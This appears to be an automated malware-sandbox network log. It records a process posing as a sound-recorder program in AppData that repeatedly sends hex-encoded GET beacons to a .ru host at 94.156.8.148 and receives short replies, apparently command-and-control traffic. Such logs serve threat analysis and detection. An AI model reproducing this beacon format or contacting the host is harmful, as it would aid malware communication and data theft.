                                                                                    Jun 11, 2024 19:43:08.901350975 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:10.046665907 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.55263194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:10.177838087 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:11.368122101 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.55263294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:11.744384050 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:12.903089046 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.55263394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:13.030652046 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:14.214755058 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.55263494.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:14.391720057 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:15.523540974 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:15.633502007 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:16.122909069 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.55263594.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:16.249164104 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:17.387645960 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.55263694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:17.515047073 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:18.622528076 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.55263794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:18.748450994 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:19.964620113 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.55263894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:20.092413902 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:21.310786963 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.55263994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:21.435794115 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:22.622318983 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:22.730067968 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:23.212305069 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:23.321052074 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:23.790903091 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:23.899061918 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:24.357000113 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.55264094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:24.599278927 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:25.743144035 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:25.852226019 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:26.306878090 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:26.414768934 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:26.887772083 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.55264194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:27.013922930 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:28.152061939 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.55264294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:28.279553890 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:29.493206978 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:29.603329897 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:30.157504082 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.55264394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:30.304614067 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:31.524456024 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:31.633411884 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:32.155364990 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.55264494.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:32.279654026 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:33.444287062 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:33.555269957 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:34.038939953 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:34.149022102 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:34.623289108 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


